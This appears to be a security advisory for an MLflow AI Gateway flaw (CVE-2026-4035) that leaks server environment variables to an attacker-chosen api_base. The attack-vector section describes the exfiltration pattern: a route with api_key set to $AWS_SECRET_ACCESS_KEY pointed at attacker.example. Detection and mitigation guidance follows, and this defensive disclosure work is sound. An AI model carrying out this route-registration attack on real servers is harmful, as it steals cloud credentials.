CVE-2026-4035 Overview
CVE-2026-4035 is an information disclosure vulnerability in mlflow/mlflow versions prior to 3.11.0. The MLflow AI Gateway resolves $ENV_VAR references within the api_key field of gateway secrets at runtime. An attacker can configure a gateway entry pointing at an attacker-controlled api_base and reference any server-side environment variable. MLflow then transmits the resolved value in the provider authentication header to the attacker's endpoint. The flaw is exploitable by low-privileged authenticated users in basic-auth deployments and by unauthenticated users in default deployments. This issue is tracked under [CWE-201: Insertion of Sensitive Information Into Sent Data].
Critical Impact
Attackers can exfiltrate cloud credentials such as AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY from the MLflow server's environment, enabling artifact poisoning and cross-boundary code execution in downstream pipelines.
Affected Products
- mlflow/mlflow versions prior to 3.11.0
- MLflow AI Gateway component
- Default (no basic-auth) and basic-auth deployments
Discovery Timeline
- 2026-06-03 - CVE-2026-4035 published to NVD
- 2026-06-03 - Last updated in NVD database
- 3.11.0 - Fix released in MLflow 3.11.0
Technical Details for CVE-2026-4035
Vulnerability Analysis
The MLflow AI Gateway lets administrators register upstream model providers and store provider credentials in api_key fields. The gateway supports $ENV_VAR references inside these fields so deployments can avoid hardcoding secrets. The resolution occurs server-side during request handling, immediately before MLflow constructs the outbound authentication header to api_base.
The gateway does not restrict which environment variables may be referenced. Any variable accessible to the MLflow server process can be expanded, including cloud provider credentials, database connection strings, and signing keys. After resolution, MLflow forwards the value as a bearer token or API key to the upstream URL the attacker controls.
The attacker captures the authentication header on their endpoint and recovers the plaintext secret. The CVSS scope is Changed because data flows from the MLflow trust boundary into an attacker-controlled system through MLflow's own request logic.
Root Cause
The root cause is unrestricted variable interpolation in gateway secret fields combined with the absence of an allowlist for upstream api_base destinations. MLflow treats $ENV_VAR as a legitimate configuration pattern without verifying the trust level of the consumer.
Attack Vector
In default deployments, an unauthenticated attacker calls the gateway configuration endpoint to register a new route with api_key: $AWS_SECRET_ACCESS_KEY and api_base: https://attacker.example. The attacker then triggers a completion request to that route. MLflow resolves the environment variable and sends it in the Authorization header to the attacker. In basic-auth deployments, any low-privileged authenticated user can perform the same flow. See the Huntr Bounty Listing and GitHub Commit Details for the technical fix.
Detection Methods for CVE-2026-4035
Indicators of Compromise
- Gateway route definitions containing $ prefixes in api_key fields that reference sensitive variables such as AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET, or GCP_SERVICE_ACCOUNT.
- Outbound HTTPS requests from MLflow servers to unrecognized api_base domains not on the organization's approved model-provider list.
- New gateway routes created by low-privileged accounts or by anonymous sessions in default deployments.
Detection Strategies
- Audit MLflow gateway configuration files and the gateway database for api_key values starting with $ and correlate them with environment variables present on the host.
- Monitor MLflow server egress traffic for connections to domains outside the allowlist of legitimate model providers such as OpenAI, Anthropic, and Azure.
- Review MLflow access logs for POST and PUT requests against gateway route management endpoints, especially from unauthenticated sources.
Monitoring Recommendations
- Enable verbose logging for the MLflow gateway and ship logs to a SIEM for correlation with network telemetry.
- Alert on any change to gateway route configuration outside of approved change windows.
- Track CloudTrail, Azure Activity, or GCP Audit logs for credential usage from IP ranges that do not match the MLflow server, which would indicate stolen-key reuse.
How to Mitigate CVE-2026-4035
Immediate Actions Required
- Upgrade mlflow/mlflow to version 3.11.0 or later on all servers running the AI Gateway.
- Rotate every credential exposed to the MLflow server process, including cloud access keys, database passwords, and provider API tokens.
- Restrict network egress from MLflow hosts to a strict allowlist of legitimate upstream model provider domains.
- Enable authentication on any MLflow deployment that is currently running without basic-auth.
Patch Information
The fix is included in MLflow 3.11.0. The maintainers removed unrestricted environment variable resolution from gateway secret fields. Review the GitHub Commit Details for the upstream patch.
Workarounds
- Run the MLflow gateway process with a minimal environment that excludes cloud and database credentials until the patch is applied.
- Place the gateway behind an authenticating reverse proxy and limit route management endpoints to administrator identities.
- Use an egress proxy that enforces an allowlist of upstream model provider hostnames, blocking exfiltration to attacker-controlled endpoints.
# Configuration example: pin MLflow to the patched release
pip install --upgrade 'mlflow>=3.11.0'
# Verify the installed version
mlflow --version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
